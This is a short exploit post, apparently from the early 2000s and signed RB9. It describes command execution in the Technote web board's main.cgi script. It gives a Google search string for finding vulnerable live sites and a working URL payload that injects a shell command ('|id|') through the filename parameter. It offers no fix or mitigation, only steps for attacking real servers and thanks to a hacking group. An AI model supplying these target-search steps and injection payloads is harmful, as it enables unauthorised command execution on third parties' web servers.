Technote Command Excution


Technote Inc. from Korea offers a Site Package which includes a web board.

Previous exploit discovered way back on year 2000 focused on a File
Disclosure Vulnerability
http://www.securityfocus.com/bid/2156/discussion/


However, command execution is also possible using the same vulnerable script.


Example...

google for "allinurl:technote/main.cgi*filename=*"


You'll get something like;

something.co.kr/.../shop.pdf?down_num=5466654&
board=rebarz99&command=down_load&filename=cc.pdf


Change the cc.pdf to some non-existing file and pipe a command

something.co.kr/.../shop.pdf?down_num=5466654&
board=rebarz99&command=down_load&filename=rb9.txt|id|



-RB9

Greetz to PhTeam members PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and others who refused to be mentioned :)